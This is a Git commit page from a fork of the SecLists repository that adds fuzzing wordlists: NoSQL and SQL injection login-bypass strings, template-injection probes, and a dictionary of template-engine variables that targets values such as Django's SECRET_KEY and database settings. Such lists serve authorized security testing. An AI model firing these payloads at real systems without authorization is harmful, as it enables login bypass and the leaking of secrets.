idan/SecLists
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/cbk914/SecLists

Browse Source
This commit is contained in:
cbk914
2020-09-30 16:37:47 +02:00
parent e06aacd937 b66822b6e7
commit ae8aabcfed
14 changed files with 1738795 additions and 515445 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
Fuzzing/Databases/NoSQL.txt
View File

@@ -9,6 +9,7 @@ $where: '1 == 1'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' || 'a'=='a
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00

77
Fuzzing/SQLi/quick-SQLi.txt Normal file
View File

@@ -0,0 +1,77 @@
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

2977
Fuzzing/XSS/XSS-OFJAAAH.txt Normal file
View File

File diff suppressed because it is too large Load Diff

4
Fuzzing/big-list-of-naughty-strings.txt
View File

@@ -543,8 +543,8 @@ http://a/%%30%30
#
# Strings which can cause a SQL injection if inputs are not sanitized
1;DROP TABLE users
1'; DROP TABLE users-- 1
1; SELECT 1
1'; SELECT 1-- 1
' OR 1=1 -- 1
' OR '1'='1

2
Fuzzing/template-engines-expression.txt
View File

@@ -7,3 +7,5 @@ ${42*42}
<%=42*42 %>
{{=42*42}}
{^xyzm42}1764{/xyzm42}
${donotexists|42*42}
[[${42*42}]]

78
Fuzzing/template-engines-special-vars.txt Normal file
View File

@@ -0,0 +1,78 @@
# The objective of this dictionary is to help to discover the template engine used
# once a evaluation of a template expression was detected via the following dictionary:
# https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-expression.txt
# Special variables are grouped by template engine in order to facilitate the identification.
# Use the term between the expression syntax identified as evaluated like "{{ xxx }}" for example.
#
# Indicate to your fuzzer to ignore a line starting with: "# " (space is important)
# You can also filter the dictionary before to use it via the command: grep -v "# " > dict.txt
#
# Sources:
# https://portswigger.net/research/server-side-template-injection
# https://github.com/epinna/tplmap
# Custom personal labs
#
# GENERIC: To cause an error and perhaps get technical information
1/0
# FREEMARKER (JAVA)
# https://freemarker.apache.org/docs/ref_specvar.html
.version
.current_template_name
.locale_object
# JINJA2 (PYTHON)
# https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
# https://stackoverflow.com/a/40346872/451455
self._TemplateReference__context
# DJANGO (PYTHON)
# https://docs.djangoproject.com/en/3.1/ref/settings/
settings
settings.DEBUG
settings.DATABASES
settings.SECRET_KEY
# PUG (NODEJS)
# https://pugjs.org
# In case of hit then use "Object.keys(VAR_NAME)" to explore the object properties
# Self object is available if the "self" options is set to true
self
# Payload below are more NodeJS related
locals
global
# ERB (RUBY)
# https://ruby-doc.org/stdlib-2.7.1/libdoc/erb/rdoc/ERB.html
ERB.version()
# TORNADO (PYTHON)
# https://www.tornadoweb.org/en/stable/template.html
# Presence of variables with a name starting with "_tt_" indicate usage of Tornado
locals()
globals()
# TWIG (PHP)
# https://twig.symfony.com/doc/3.x/
_self
_self.getTemplateName().__toString
_context
_context|length
_context|keys|first
constant('Twig_Environment::VERSION')
constant('Twig_Environment::VERSION_ID')
constant('Twig_Environment::EXTRA_VERSION')
# VELOCITY (JAVA)
# http://velocity.apache.org/tools/devel/generic.html
$context.keys
$context.TOOLS_VERSION
$field.in("org.apache.velocity.runtime.VelocityEngineVersion")
$field.in("org.apache.velocity.runtime.RuntimeConstants")
# THYMELEAF (JAVA)
# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#variables
# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#execution-info
#execInfo
#execInfo.templateStack
#execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
execInfo
execInfo.templateStack
execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
# SMARTY (PHP)
# https://www.smarty.net/docs/en/language.syntax.variables.tpl
# https://www.smarty.net/docs/en/language.variables.smarty.tpl#language.variables.smarty.config
$smarty.version
$smarty.config
$smarty.template